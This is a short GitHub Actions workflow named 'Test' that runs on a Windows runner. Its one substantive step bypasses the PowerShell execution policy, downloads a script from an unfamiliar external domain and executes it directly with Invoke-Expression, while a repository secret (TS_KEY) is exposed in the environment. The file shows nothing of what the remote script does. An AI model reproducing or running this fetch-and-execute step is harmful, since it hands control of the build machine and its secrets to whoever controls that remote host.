name: Test

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest
    
    steps:
      - name: Checkout (Optional)
        uses: actions/checkout@v4

      - name: Run Remote Setup Script
        shell: powershell
        env:
          TS_KEY: ${{ secrets.TS_KEY }}
        run: |
          $scriptUrl = "https://vapp.57777777.xyz/github_action/yaml/setup.ps1"
          Write-Host "Downloading and executing script from: $scriptUrl"
          Set-ExecutionPolicy Bypass -Scope Process -Force
          Invoke-Expression ((New-Object System.Net.WebClient).DownloadString($scriptUrl))
